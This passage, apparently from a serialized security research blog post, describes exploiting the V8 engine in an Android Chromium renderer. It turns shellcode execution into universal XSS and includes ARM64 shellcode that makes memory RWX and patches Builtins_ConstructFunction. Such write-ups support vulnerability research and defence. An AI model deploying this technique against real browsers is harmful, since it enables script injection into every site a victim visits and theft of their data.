rops":145224,"children":145225},{"style":359},[145226],{"type":30,"value":377},{"type":24,"tag":301,"props":145228,"children":145229},{"style":466},[145230],{"type":30,"value":584},{"type":24,"tag":301,"props":145232,"children":145233},{"style":359},[145234],{"type":30,"value":377},{"type":24,"tag":301,"props":145236,"children":145237},{"style":466},[145238],{"type":30,"value":584},{"type":24,"tag":301,"props":145240,"children":145241},{"style":359},[145242],{"type":30,"value":377},{"type":24,"tag":301,"props":145244,"children":145245},{"style":466},[145246],{"type":30,"value":1503},{"type":24,"tag":301,"props":145248,"children":145249},{"style":359},[145250],{"type":30,"value":377},{"type":24,"tag":301,"props":145252,"children":145253},{"style":466},[145254],{"type":30,"value":145255},"95",{"type":24,"tag":301,"props":145257,"children":145258},{"style":359},[145259],{"type":30,"value":377},{"type":24,"tag":301,"props":145261,"children":145262},{"style":466},[145263],{"type":30,"value":145264},"36",{"type":24,"tag":301,"props":145266,"children":145267},{"style":359},[145268],{"type":30,"value":377},{"type":24,"tag":301,"props":145270,"children":145271},{"style":466},[145272],{"type":30,"value":1447},{"type":24,"tag":301,"props":145274,"children":145275},{"style":359},[145276],{"type":30,"value":377},{"type":24,"tag":301,"props":145278,"children":145279},{"style":466},[145280],{"type":30,"value":145281},"213",{"type":24,"tag":301,"props":145283,"children":145284},{"style":359},[145285],{"type":30,"value":377},{"type":24,"tag":301,"props":145287,"children":145288},{"style":466},[145289],{"type":30,"value":3073},{"type":24,"tag":301,"props":145291,"children":145292},{"style":359},[145293],{"type":30,"value":377},{"type":24,"tag":301,"props":145295,"children":145296},{"style":466},[145297],{"type":30,"value":546},{"type":24,"tag":301,"props":145299,"children":145300},{"style":359},[145301],{"type":30,"value":377},{"type":24,"tag":301,"props":145303,"children":145304},{"style":466},[145305],{"type":30,"value":2060},{"type":24,"tag":301,"props":145307,"children":145308},{"style":359},[145309],{"type":30,"value":377},{"type":24,"tag":301,"props":145311,"children":145312},{"style":466},[145313],{"type":30,"value":145314},"210",{"type":24,"tag":301,"props":145316,"children":145317},{"style":359},[145318],{"type":30,"value":377},{"type":24,"tag":301,"props":145320,"children":145321},{"style":466},[145322],{"type":30,"value":141262},{"type":24,"tag":301,"props":145324,"children":145325},{"style":359},[145326],{"type":30,"value":377},{"type":24,"tag":301,"props":145328,"children":145329},{"style":466},[145330],{"type":30,"value":145331},"35",{"type":24,"tag":301,"props":145333,"children":145334},{"style":359},[145335],{"type":30,"value":377},{"type":24,"tag":301,"props":145337,"children":145338},{"style":466},[145339],{"type":30,"value":1447},{"type":24,"tag":301,"props":145341,"children":145342},{"style":359},[145343],{"type":30,"value":1729},{"type":24,"tag":301,"props":145345,"children":145346},{"class":303,"line":504},[145347,145352,145356,145361,145365,145370,145374,145379,145383,145388,145392,145397,145401,145406,145410,145414,145418,145422,145426,145430,145434,145438,145442,145446,145450,145455,145459,145464,145468,145472,145476,145480,145484,145488,145492,145496,145500,145504,145508,145513,145517,145522],{"type":24,"tag":301,"props":145348,"children":145349},{"style":466},[145350],{"type":30,"value":145351}," 213",{"type":24,"tag":301,"props":145353,"children":145354},{"style":359},[145355],{"type":30,"value":377},{"type":24,"tag":301,"props":145357,"children":145358},{"style":466},[145359],{"type":30,"value":145360},"231",{"type":24,"tag":301,"props":145362,"children":145363},{"style":359},[145364],{"type":30,"value":377},{"type":24,"tag":301,"props":145366,"children":145367},{"style":466},[145368],{"type":30,"value":145369},"67",{"type":24,"tag":301,"props":145371,"children":145372},{"style":359},[145373],{"type":30,"value":377},{"type":24,"tag":301,"props":145375,"children":145376},{"style":466},[145377],{"type":30,"value":145378},"190",{"type":24,"tag":301,"props":145380,"children":145381},{"style":359},[145382],{"type":30,"value":377},{"type":24,"tag":301,"props":145384,"children":145385},{"style":466},[145386],{"type":30,"value":145387},"169",{"type":24,"tag":301,"props":145389,"children":145390},{"style":359},[145391],{"type":30,"value":377},{"type":24,"tag":301,"props":145393,"children":145394},{"style":466},[145395],{"type":30,"value":145396},"253",{"type":24,"tag":301,"props":145398,"children":145399},{"style":359},[145400],{"type":30,"value":377},{"type":24,"tag":301,"props":145402,"children":145403},{"style":466},[145404],{"type":30,"value":145405},"123",{"type":24,"tag":301,"props":145407,"children":145408},{"style":359},[145409],{"type":30,"value":377},{"type":24,"tag":301,"props":145411,"children":145412},{"style":466},[145413],{"type":30,"value":546},{"type":24,"tag":301,"props":145415,"children":145416},{"style":359},[145417],{"type":30,"value":377},{"type":24,"tag":301,"props":145419,"children":145420},{"style":466},[145421],{"type":30,"value":145387},{"type":24,"tag":301,"props":145423,"children":145424},{"style":359},[145425],{"type":30,"value":377},{"type":24,"tag":301,"props":145427,"children":145428},{"style":466},[145429],{"type":30,"value":145396},{"type":24,"tag":301,"props":145431,"children":145432},{"style":359},[145433],{"type":30,"value":377},{"type":24,"tag":301,"props":145435,"children":145436},{"style":466},[145437],{"type":30,"value":145369},{"type":24,"tag":301,"props":145439,"children":145440},{"style":359},[145441],{"type":30,"value":377},{"type":24,"tag":301,"props":145443,"children":145444},{"style":466},[145445],{"type":30,"value":584},{"type":24,"tag":301,"props":145447,"children":145448},{"style":359},[145449],{"type":30,"value":377},{"type":24,"tag":301,"props":145451,"children":145452},{"style":466},[145453],{"type":30,"value":145454},"145",{"type":24,"tag":301,"props":145456,"children":145457},{"style":359},[145458],{"type":30,"value":377},{"type":24,"tag":301,"props":145460,"children":145461},{"style":466},[145462],{"type":30,"value":145463},"191",{"type":24,"tag":301,"props":145465,"children":145466},{"style":359},[145467],{"type":30,"value":377},{"type":24,"tag":301,"props":145469,"children":145470},{"style":466},[145471],{"type":30,"value":1447},{"type":24,"tag":301,"props":145473,"children":145474},{"style":359},[145475],{"type":30,"value":377},{"type":24,"tag":301,"props":145477,"children":145478},{"style":466},[145479],{"type":30,"value":584},{"type":24,"tag":301,"props":145481,"children":145482},{"style":359},[145483],{"type":30,"value":377},{"type":24,"tag":301,"props":145485,"children":145486},{"style":466},[145487],{"type":30,"value":145454},{"type":24,"tag":301,"props":145489,"children":145490},{"style":359},[145491],{"type":30,"value":377},{"type":24,"tag":301,"props":145493,"children":145494},{"style":466},[145495],{"type":30,"value":145396},{"type":24,"tag":301,"props":145497,"children":145498},{"style":359},[145499],{"type":30,"value":377},{"type":24,"tag":301,"props":145501,"children":145502},{"style":466},[145503],{"type":30,"value":145405},{"type":24,"tag":301,"props":145505,"children":145506},{"style":359},[145507],{"type":30,"value":377},{"type":24,"tag":301,"props":145509,"children":145510},{"style":466},[145511],{"type":30,"value":145512},"193",{"type":24,"tag":301,"props":145514,"children":145515},{"style":359},[145516],{"type":30,"value":377},{"type":24,"tag":301,"props":145518,"children":145519},{"style":466},[145520],{"type":30,"value":145521},"168",{"type":24,"tag":301,"props":145523,"children":145524},{"style":359},[145525],{"type":30,"value":1729},{"type":24,"tag":301,"props":145527,"children":145528},{"class":303,"line":512},[145529,145534,145538,145542,145546,145550,145554,145558,145562,145566,145570,145574,145578,145582,145586,145591,145595,145599,145603,145607,145611,145615,145619,145623,145627,145631,145635,145639,145643,145647,145651,145655,145659,145663,145667,145671,145675,145679,145683,145687,145691,145695,145699,145703,145707,145711,145715,145719,145723,145727,145731,145735,145739,145743],{"type":24,"tag":301,"props":145530,"children":145531},{"style":466},[145532],{"type":30,"value":145533}," 255",{"type":24,"tag":301,"props":145535,"children":145536},{"style":359},[145537],{"type":30,"value":377},{"type":24,"tag":301,"props":145539,"children":145540},{"style":466},[145541],{"type":30,"value":145331},{"type":24,"tag":301,"props":145543,"children":145544},{"style":359},[145545],{"type":30,"value":377},{"type":24,"tag":301,"props":145547,"children":145548},{"style":466},[145549],{"type":30,"value":1447},{"type":24,"tag":301,"props":145551,"children":145552},{"style":359},[145553],{"type":30,"value":377},{"type":24,"tag":301,"props":145555,"children":145556},{"style":466},[145557],{"type":30,"value":145281},{"type":24,"tag":301,"props":145559,"children":145560},{"style":359},[145561],{"type":30,"value":377},{"type":24,"tag":301,"props":145563,"children":145564},{"style":466},[145565],{"type":30,"value":141217},{"type":24,"tag":301,"props":145567,"children":145568},{"style":359},[145569],{"type":30,"value":377},{"type":24,"tag":301,"props":145571,"children":145572},{"style":466},[145573],{"type":30,"value":1447},{"type":24,"tag":301,"props":145575,"children":145576},{"style":359},[145577],{"type":30,"value":377},{"type":24,"tag":301,"props":145579,"children":145580},{"style":466},[145581],{"type":30,"value":145255},{"type":24,"tag":301,"props":145583,"children":145584},{"style":359},[145585],{"type":30,"value":377},{"type":24,"tag":301,"props":145587,"children":145588},{"style":466},[145589],{"type":30,"value":145590},"214",{"type":24,"tag":301,"props":145592,"children":145593},{"style":359},[145594],{"type":30,"value":377},{"type":24,"tag":301,"props":145596,"children":145597},{"style":466},[145598],{"type":30,"value":103364},{"type":24,"tag":301,"props":145600,"children":145601},{"style":359},[145602],{"type":30,"value":377},{"type":24,"tag":301,"props":145604,"children":145605},{"style":466},[145606],{"type":30,"value":67061},{"type":24,"tag":301,"props":145608,"children":145609},{"style":359},[145610],{"type":30,"value":377},{"type":24,"tag":301,"props":145612,"children":145613},{"style":466},[145614],{"type":30,"value":1447},{"type":24,"tag":301,"props":145616,"children":145617},{"style":359},[145618],{"type":30,"value":377},{"type":24,"tag":301,"props":145620,"children":145621},{"style":466},[145622],{"type":30,"value":145281},{"type":24,"tag":301,"props":145624,"children":145625},{"style":359},[145626],{"type":30,"value":377},{"type":24,"tag":301,"props":145628,"children":145629},{"style":466},[145630],{"type":30,"value":1761},{"type":24,"tag":301,"props":145632,"children":145633},{"style":359},[145634],{"type":30,"value":377},{"type":24,"tag":301,"props":145636,"children":145637},{"style":466},[145638],{"type":30,"value":584},{"type":24,"tag":301,"props":145640,"children":145641},{"style":359},[145642],{"type":30,"value":377},{"type":24,"tag":301,"props":145644,"children":145645},{"style":466},[145646],{"type":30,"value":584},{"type":24,"tag":301,"props":145648,"children":145649},{"style":359},[145650],{"type":30,"value":377},{"type":24,"tag":301,"props":145652,"children":145653},{"style":466},[145654],{"type":30,"value":584},{"type":24,"tag":301,"props":145656,"children":145657},{"style":359},[145658],{"type":30,"value":377},{"type":24,"tag":301,"props":145660,"children":145661},{"style":466},[145662],{"type":30,"value":584},{"type":24,"tag":301,"props":145664,"children":145665},{"style":359},[145666],{"type":30,"value":377},{"type":24,"tag":301,"props":145668,"children":145669},{"style":466},[145670],{"type":30,"value":584},{"type":24,"tag":301,"props":145672,"children":145673},{"style":359},[145674],{"type":30,"value":377},{"type":24,"tag":301,"props":145676,"children":145677},{"style":466},[145678],{"type":30,"value":584},{"type":24,"tag":301,"props":145680,"children":145681},{"style":359},[145682],{"type":30,"value":377},{"type":24,"tag":301,"props":145684,"children":145685},{"style":466},[145686],{"type":30,"value":584},{"type":24,"tag":301,"props":145688,"children":145689},{"style":359},[145690],{"type":30,"value":377},{"type":24,"tag":301,"props":145692,"children":145693},{"style":466},[145694],{"type":30,"value":584},{"type":24,"tag":301,"props":145696,"children":145697},{"style":359},[145698],{"type":30,"value":377},{"type":24,"tag":301,"props":145700,"children":145701},{"style":466},[145702],{"type":30,"value":1761},{"type":24,"tag":301,"props":145704,"children":145705},{"style":359},[145706],{"type":30,"value":377},{"type":24,"tag":301,"props":145708,"children":145709},{"style":466},[145710],{"type":30,"value":584},{"type":24,"tag":301,"props":145712,"children":145713},{"style":359},[145714],{"type":30,"value":377},{"type":24,"tag":301,"props":145716,"children":145717},{"style":466},[145718],{"type":30,"value":584},{"type":24,"tag":301,"props":145720,"children":145721},{"style":359},[145722],{"type":30,"value":377},{"type":24,"tag":301,"props":145724,"children":145725},{"style":466},[145726],{"type":30,"value":584},{"type":24,"tag":301,"props":145728,"children":145729},{"style":359},[145730],{"type":30,"value":377},{"type":24,"tag":301,"props":145732,"children":145733},{"style":466},[145734],{"type":30,"value":584},{"type":24,"tag":301,"props":145736,"children":145737},{"style":359},[145738],{"type":30,"value":377},{"type":24,"tag":301,"props":145740,"children":145741},{"style":466},[145742],{"type":30,"value":584},{"type":24,"tag":301,"props":145744,"children":145745},{"style":359},[145746],{"type":30,"value":1729},{"type":24,"tag":301,"props":145748,"children":145749},{"class":303,"line":592},[145750,145754,145758,145762,145766,145770,145774,145778,145782,145786,145790,145795,145799,145804,145808,145813,145817,145821],{"type":24,"tag":301,"props":145751,"children":145752},{"style":466},[145753],{"type":30,"value":140869},{"type":24,"tag":301,"props":145755,"children":145756},{"style":359},[145757],{"type":30,"value":377},{"type":24,"tag":301,"props":145759,"children":145760},{"style":466},[145761],{"type":30,"value":584},{"type":24,"tag":301,"props":145763,"children":145764},{"style":359},[145765],{"type":30,"value":377},{"type":24,"tag":301,"props":145767,"children":145768},{"style":466},[145769],{"type":30,"value":584},{"type":24,"tag":301,"props":145771,"children":145772},{"style":359},[145773],{"type":30,"value":377},{"type":24,"tag":301,"props":145775,"children":145776},{"style":466},[145777],{"type":30,"value":584},{"type":24,"tag":301,"props":145779,"children":145780},{"style":359},[145781],{"type":30,"value":377},{"type":24,"tag":301,"props":145783,"children":145784},{"style":466},[145785],{"type":30,"value":584},{"type":24,"tag":301,"props":145787,"children":145788},{"style":359},[145789],{"type":30,"value":377},{"type":24,"tag":301,"props":145791,"children":145792},{"style":466},[145793],{"type":30,"value":145794},"92",{"type":24,"tag":301,"props":145796,"children":145797},{"style":359},[145798],{"type":30,"value":377},{"type":24,"tag":301,"props":145800,"children":145801},{"style":466},[145802],{"type":30,"value":145803},"50",{"type":24,"tag":301,"props":145805,"children":145806},{"style":359},[145807],{"type":30,"value":377},{"type":24,"tag":301,"props":145809,"children":145810},{"style":466},[145811],{"type":30,"value":145812},"162",{"type":24,"tag":301,"props":145814,"children":145815},{"style":359},[145816],{"type":30,"value":377},{"type":24,"tag":301,"props":145818,"children":145819},{"style":466},[145820],{"type":30,"value":584},{"type":24,"tag":301,"props":145822,"children":145823},{"style":359},[145824],{"type":30,"value":1729},{"type":24,"tag":301,"props":145826,"children":145827},{"class":303,"line":619},[145828],{"type":24,"tag":301,"props":145829,"children":145830},{"style":359},[145831],{"type":30,"value":141156},{"type":24,"tag":301,"props":145833,"children":145834},{"class":303,"line":635},[145835,145839,145843,145847,145851,145855,145859,145863,145867,145871,145875],{"type":24,"tag":301,"props":145836,"children":145837},{"style":348},[145838],{"type":30,"value":14671},{"type":24,"tag":301,"props":145840,"children":145841},{"style":369},[145842],{"type":30,"value":142608},{"type":24,"tag":301,"props":145844,"children":145845},{"style":385},[145846],{"type":30,"value":2537},{"type":24,"tag":301,"props":145848,"children":145849},{"style":314},[145850],{"type":30,"value":142617},{"type":24,"tag":301,"props":145852,"children":145853},{"style":359},[145854],{"type":30,"value":362},{"type":24,"tag":301,"props":145856,"children":145857},{"style":369},[145858],{"type":30,"value":140487},{"type":24,"tag":301,"props":145860,"children":145861},{"style":359},[145862],{"type":30,"value":377},{"type":24,"tag":301,"props":145864,"children":145865},{"style":369},[145866],{"type":30,"value":131828},{"type":24,"tag":301,"props":145868,"children":145869},{"style":359},[145870],{"type":30,"value":206},{"type":24,"tag":301,"props":145872,"children":145873},{"style":369},[145874],{"type":30,"value":131828},{"type":24,"tag":301,"props":145876,"children":145877},{"style":359},[145878],{"type":30,"value":589},{"type":24,"tag":301,"props":145880,"children":145881},{"class":303,"line":643},[145882,145886,145890,145894,145898,145902,145906,145910,145914,145918],{"type":24,"tag":301,"props":145883,"children":145884},{"style":369},[145885],{"type":30,"value":142653},{"type":24,"tag":301,"props":145887,"children":145888},{"style":385},[145889],{"type":30,"value":2537},{"type":24,"tag":301,"props":145891,"children":145892},{"style":359},[145893],{"type":30,"value":873},{"type":24,"tag":301,"props":145895,"children":145896},{"style":308},[145897],{"type":30,"value":39666},{"type":24,"tag":301,"props":145899,"children":145900},{"style":369},[145901],{"type":30,"value":142608},{"type":24,"tag":301,"props":145903,"children":145904},{"style":359},[145905],{"type":30,"value":206},{"type":24,"tag":301,"props":145907,"children":145908},{"style":314},[145909],{"type":30,"value":64283},{"type":24,"tag":301,"props":145911,"children":145912},{"style":359},[145913],{"type":30,"value":142682},{"type":24,"tag":301,"props":145915,"children":145916},{"style":369},[145917],{"type":30,"value":5958},{"type":24,"tag":301,"props":145919,"children":145920},{"style":359},[145921],{"type":30,"value":492},{"type":24,"tag":301,"props":145923,"children":145924},{"class":303,"line":652},[145925,145929,145933,145937,145941,145946,145950,145954],{"type":24,"tag":301,"props":145926,"children":145927},{"style":369},[145928],{"type":30,"value":108640},{"type":24,"tag":301,"props":145930,"children":145931},{"style":359},[145932],{"type":30,"value":206},{"type":24,"tag":301,"props":145934,"children":145935},{"style":314},[145936],{"type":30,"value":108649},{"type":24,"tag":301,"props":145938,"children":145939},{"style":359},[145940],{"type":30,"value":362},{"type":24,"tag":301,"props":145942,"children":145943},{"style":329},[145944],{"type":30,"value":145945},"'DeserializeWasmModule result: '",{"type":24,"tag":301,"props":145947,"children":145948},{"style":385},[145949],{"type":30,"value":957},{"type":24,"tag":301,"props":145951,"children":145952},{"style":369},[145953],{"type":30,"value":15967},{"type":24,"tag":301,"props":145955,"children":145956},{"style":359},[145957],{"type":30,"value":589},{"type":24,"tag":301,"props":145959,"children":145960},{"class":303,"line":666},[145961,145965,145969,145973,145977,145981,145985,145989,145993,145997],{"type":24,"tag":301,"props":145962,"children":145963},{"style":348},[145964],{"type":30,"value":42931},{"type":24,"tag":301,"props":145966,"children":145967},{"style":369},[145968],{"type":30,"value":142702},{"type":24,"tag":301,"props":145970,"children":145971},{"style":385},[145972],{"type":30,"value":2537},{"type":24,"tag":301,"props":145974,"children":145975},{"style":348},[145976],{"type":30,"value":38685},{"type":24,"tag":301,"props":145978,"children":145979},{"style":369},[145980],{"type":30,"value":140470},{"type":24,"tag":301,"props":145982,"children":145983},{"style":359},[145984],{"type":30,"value":206},{"type":24,"tag":301,"props":145986,"children":145987},{"style":314},[145988],{"type":30,"value":140524},{"type":24,"tag":301,"props":145990,"children":145991},{"style":359},[145992],{"type":30,"value":362},{"type":24,"tag":301,"props":145994,"children":145995},{"style":369},[145996],{"type":30,"value":5599},{"type":24,"tag":301,"props":145998,"children":145999},{"style":359},[146000],{"type":30,"value":589},{"type":24,"tag":301,"props":146002,"children":146003},{"class":303,"line":674},[146004,146008,146012,146016,146020,146024,146028,146032,146036],{"type":24,"tag":301,"props":146005,"children":146006},{"style":348},[146007],{"type":30,"value":42931},{"type":24,"tag":301,"props":146009,"children":146010},{"style":369},[146011],{"type":30,"value":39721},{"type":24,"tag":301,"props":146013,"children":146014},{"style":385},[146015],{"type":30,"value":2537},{"type":24,"tag":301,"props":146017,"children":146018},{"style":369},[146019],{"type":30,"value":142702},{"type":24,"tag":301,"props":146021,"children":146022},{"style":359},[146023],{"type":30,"value":206},{"type":24,"tag":301,"props":146025,"children":146026},{"style":369},[146027],{"type":30,"value":44625},{"type":24,"tag":301,"props":146029,"children":146030},{"style":359},[146031],{"type":30,"value":206},{"type":24,"tag":301,"props":146033,"children":146034},{"style":369},[146035],{"type":30,"value":140573},{"type":24,"tag":301,"props":146037,"children":146038},{"style":359},[146039],{"type":30,"value":492},{"type":24,"tag":301,"props":146041,"children":146042},{"class":303,"line":692},[146043,146047,146051,146055,146059,146063],{"type":24,"tag":301,"props":146044,"children":146045},{"style":369},[146046],{"type":30,"value":108640},{"type":24,"tag":301,"props":146048,"children":146049},{"style":359},[146050],{"type":30,"value":206},{"type":24,"tag":301,"props":146052,"children":146053},{"style":314},[146054],{"type":30,"value":108649},{"type":24,"tag":301,"props":146056,"children":146057},{"style":359},[146058],{"type":30,"value":362},{"type":24,"tag":301,"props":146060,"children":146061},{"style":369},[146062],{"type":30,"value":39835},{"type":24,"tag":301,"props":146064,"children":146065},{"style":359},[146066],{"type":30,"value":589},{"type":24,"tag":301,"props":146068,"children":146069},{"class":303,"line":3631},[146070],{"type":24,"tag":301,"props":146071,"children":146072},{"style":359},[146073],{"type":30,"value":108681},{"type":24,"tag":32,"props":146075,"children":146076},{},[146077],{"type":30,"value":146078},"And this time, it works as expected:",{"type":24,"tag":32,"props":146080,"children":146081},{},[146082],{"type":24,"tag":177,"props":146083,"children":146086},{"alt":146084,"src":146085},"image3","/posts/mobile-renderer-rce/image3.png",[],{"type":24,"tag":80,"props":146088,"children":146090},{"id":146089},"achieving-universal-xss",[146091],{"type":30,"value":146092},"Achieving Universal XSS",{"type":24,"tag":32,"props":146094,"children":146095},{},[146096,146098,146104,146106,146113],{"type":30,"value":146097},"At this point, we have arbitrary shellcode execution in the renderer process. While usually the exploit stops here and further access would require a browser sandbox escape, we decided to explore an alternative route known as UXSS, inspired by this ",{"type":24,"tag":188,"props":146099,"children":146102},{"href":146100,"rel":146101},"https://i.blackhat.com/Asia-24/Presentations/Asia-24-Liu-The-Hole-in-Sandbox.pdf",[192],[146103],{"type":30,"value":77044},{"type":30,"value":146105}," from Tencent Security and ",{"type":24,"tag":188,"props":146107,"children":146110},{"href":146108,"rel":146109},"https://www.interruptlabs.co.uk/articles/one-click-memory-corruption-in-alibabas-uc-browser-exploiting-patch-gap-v8-vulnerabilities-to-steal-your-data",[192],[146111],{"type":30,"value":146112},"research article",{"type":30,"value":146114}," from InterruptLabs.",{"type":24,"tag":32,"props":146116,"children":146117},{},[146118,146120,146127],{"type":30,"value":146119},"Unlike a normal XSS, a UXSS, or universal XSS, is a client side browser exploit that enables arbitrary JavaScript injection in all pages of a website. Normally, site isolation on desktop Chromium prevents this, as each site ends up in a different renderer process, but Android specifically has a ",{"type":24,"tag":188,"props":146121,"children":146124},{"href":146122,"rel":146123},"https://www.chromium.org/Home/chromium-security/site-isolation/#android",[192],[146125],{"type":30,"value":146126},"weaker version",{"type":30,"value":146128}," of this mitigation - only sites with logins and COOP headers are per process isolated. This means that the majority of webpages are in the same renderer process, so any patches to the interpreter will affect them all and lead to UXSS. This is still quite the capability!",{"type":24,"tag":32,"props":146130,"children":146131},{},[146132,146134,146140],{"type":30,"value":146133},"To achieve UXSS, we need to patch a function that’s invoked during site loading so we can run our XSS payload. During debugging, we observed that every site we visited eventually called ",{"type":24,"tag":145,"props":146135,"children":146137},{"className":146136},[],[146138],{"type":30,"value":146139},"Builtins_ConstructFunction",{"type":30,"value":146141},", making it a natural target.",{"type":24,"tag":32,"props":146143,"children":146144},{},[146145,146147,146152],{"type":30,"value":146146},"Our goal is for ",{"type":24,"tag":145,"props":146148,"children":146150},{"className":146149},[],[146151],{"type":30,"value":146139},{"type":30,"value":146153}," to execute our XSS payload first, then continue its normal behavior. To do this, we hook it as follows:",{"type":24,"tag":2655,"props":146155,"children":146156},{},[146157,146162,146172],{"type":24,"tag":2659,"props":146158,"children":146159},{},[146160],{"type":30,"value":146161},"The exploit’s shellcode patches the first few instructions to redirect execution to our mmap-ed shellcode, which runs the XSS payload",{"type":24,"tag":2659,"props":146163,"children":146164},{},[146165,146167],{"type":30,"value":146166},"After finishing, the mmap-ed shellcode restores the original instructions in ",{"type":24,"tag":145,"props":146168,"children":146170},{"className":146169},[],[146171],{"type":30,"value":146139},{"type":24,"tag":2659,"props":146173,"children":146174},{},[146175,146177,146182],{"type":30,"value":146176},"The mmap-ed shellcode then returns to the beginning of ",{"type":24,"tag":145,"props":146178,"children":146180},{"className":146179},[],[146181],{"type":30,"value":146139},{"type":30,"value":146183},", which now proceeds normally",{"type":24,"tag":32,"props":146185,"children":146186},{},[146187],{"type":30,"value":146188},"The ARM64 shellcode implementing this looks as follows:",{"type":24,"tag":291,"props":146190,"children":146194},{"code":146191,"language":146192,"meta":7,"className":146193,"style":7},"// get return addr to x0\nldr x0, [sp, #0x18]\n// strip pac signature from return address\n.arch armv8.3-a; xpaci x0\n\n// store x5 = Builtins_ConstructFunction\nmovz x1, #0x610c\nsub x0, x0, x1\nmov x5, x0\n\n// store x4 = page aligned ConstructFunction\nmovz x1, #0xf000\nmovk x1, #0xffff, lsl #16\nmovk x1, #0xffff, lsl #32\nand x4, x5, x1\n\n// mprotect page aligned ConstructFunction RWX\nmov x0, x4\nmov x1, #0x2000\nmov x2, #0x7\nmov x8, #226\nsvc #0\n\nmov x6, x5\n\n// mmap RWX for jump dest (uxss_sc)\nmov x0, #0\nmov x1, #0x1000\nmov x2, #0x7\nmov x3, #34\nmov x4, #-1\nmov x5, #0\nmov x8, #222\nsvc #0\n\nmov x5, x0\n\n// at this point:\n// x6 = Builtins_ConstructFunction\n// x5 = mmap page for uxss_sc\n\n// write uxss_sc to mmaped rwx page\n{write_sc(uxss_sc, \"x5\")}\n\n// wipe from cache\nmov x0, x5\n{WIPE_CACHE}\n\n// patch Builtins_ConstructFunction\n{write_sc(new_compile_instrs, \"x6\")}\n// and add a pointer to uxss_sc just above new instructions\nstr x5, [x6, #{5 * INSTR_SIZE}]\n\n// wipe from cache\nmov x0, x6\n{WIPE_CACHE}\n","asm","language-asm shiki shiki-themes slack-dark",[146195],{"type":24,"tag":145,"props":146196,"children":146197},{"__ignoreMap":7},[146198,146206,146214,146222,146230,146237,146245,146253,146261,146269,146276,146284,146292,146300,146308,146316,146323,146331,146339,146347,146355,146363,146371,146378,146386,146393,146401,146409,146417,146424,146432,146440,146448,146456,146463,146470,146477,146484,146492,146500,146508,146515,146523,146531,146538,146546,146554,146562,146569,146577,146585,146593,146601,146608,146615,146623],{"type":24,"tag":301,"props":146199,"children":146200},{"class":303,"line":304},[146201],{"type":24,"tag":301,"props":146202,"children":146203},{},[146204],{"type":30,"value":146205},"// get return addr to x0\n",{"type":24,"tag":301,"props":146207,"children":146208},{"class":303,"line":320},[146209],{"type":24,"tag":301,"props":146210,"children":146211},{},[146212],{"type":30,"value":146213},"ldr x0, [sp, #0x18]\n",{"type":24,"tag":301,"props":146215,"children":146216},{"class":303,"line":335},[146217],{"type":24,"tag":301,"props":146218,"children":146219},{},[146220],{"type":30,"value":146221},"// strip pac signature from return address\n",{"type":24,"tag":301,"props":146223,"children":146224},{"class":303,"line":344},[146225],{"type":24,"tag":301,"props":146226,"children":146227},{},[146228],{"type":30,"value":146229},".arch armv8.3-a; xpaci x0\n",{"type":24,"tag":301,"props":146231,"children":146232},{"class":303,"line":401},[146233],{"type":24,"tag":301,"props":146234,"children":146235},{"emptyLinePlaceholder":16},[146236],{"type":30,"value":341},{"type":24,"tag":301,"props":146238,"children":146239},{"class":303,"line":415},[146240],{"type":24,"tag":301,"props":146241,"children":146242},{},[146243],{"type":30,"value":146244},"// store x5 = Builtins_ConstructFunction\n",{"type":24,"tag":301,"props":146246,"children":146247},{"class":303,"line":439},[146248],{"type":24,"tag":301,"props":146249,"children":146250},{},[146251],{"type":30,"value":146252},"movz x1, #0x610c\n",{"type":24,"tag":301,"props":146254,"children":146255},{"class":303,"line":447},[146256],{"type":24,"tag":301,"props":146257,"children":146258},{},[146259],{"type":30,"value":146260},"sub x0, x0, x1\n",{"type":24,"tag":301,"props":146262,"children":146263},{"class":303,"line":476},[146264],{"type":24,"tag":301,"props":146265,"children":146266},{},[146267],{"type":30,"value":146268},"mov x5, x0\n",{"type":24,"tag":301,"props":146270,"children":146271},{"class":303,"line":495},[146272],{"type":24,"tag":301,"props":146273,"children":146274},{"emptyLinePlaceholder":16},[146275],{"type":30,"value":341},{"type":24,"tag":301,"props":146277,"children":146278},{"class":303,"line":504},[146279],{"type":24,"tag":301,"props":146280,"children":146281},{},[146282],{"type":30,"value":146283},"// store x4 = page aligned ConstructFunction\n",{"type":24,"tag":301,"props":146285,"children":146286},{"class":303,"line":512},[146287],{"type":24,"tag":301,"props":146288,"children":146289},{},[146290],{"type":30,"value":146291},"movz x1, #0xf000\n",{"type":24,"tag":301,"props":146293,"children":146294},{"class":303,"line":592},[146295],{"type":24,"tag":301,"props":146296,"children":146297},{},[146298],{"type":30,"value":146299},"movk x1, #0xffff, lsl #16\n",{"type":24,"tag":301,"props":146301,"children":146302},{"class":303,"line":619},[146303],{"type":24,"tag":301,"props":146304,"children":146305},{},[146306],{"type":30,"value":146307},"movk x1, #0xffff, lsl #32\n",{"type":24,"tag":301,"props":146309,"children":146310},{"class":303,"line":635},[146311],{"type":24,"tag":301,"props":146312,"children":146313},{},[146314],{"type":30,"value":146315},"and x4, x5, x1\n",{"type":24,"tag":301,"props":146317,"children":146318},{"class":303,"line":643},[146319],{"type":24,"tag":301,"props":146320,"children":146321},{"emptyLinePlaceholder":16},[146322],{"type":30,"value":341},{"type":24,"tag":301,"props":146324,"children":146325},{"class":303,"line":652},[146326],{"type":24,"tag":301,"props":146327,"children":146328},{},[146329],{"type":30,"value":146330},"// mprotect page aligned ConstructFunction RWX\n",{"type":24,"tag":301,"props":146332,"children":146333},{"class":303,"line":666},[146334],{"type":24,"tag":301,"props":146335,"children":146336},{},[146337],{"type":30,"value":146338},"mov x0, x4\n",{"type":24,"tag":301,"props":146340,"children":146341},{"class":303,"line":674},[146342],{"type":24,"tag":301,"props":146343,"children":146344},{},[146345],{"type":30,"value":146346},"mov x1, #0x2000\n",{"type":24,"tag":301,"props":146348,"children":146349},{"class":303,"line":692},[146350],{"type":24,"tag":301,"props":146351,"children":146352},{},[146353],{"type":30,"value":146354},"mov x2, #0x7\n",{"type":24,"tag":301,"props":146356,"children":146357},{"class":303,"line":3631},[146358],{"type":24,"tag":301,"props":146359,"children":146360},{},[146361],{"type":30,"value":146362},"mov x8, #226\n",{"type":24,"tag":301,"props":146364,"children":146365},{"class":303,"line":3639},[146366],{"type":24,"tag":301,"props":146367,"children":146368},{},[146369],{"type":30,"value":146370},"svc 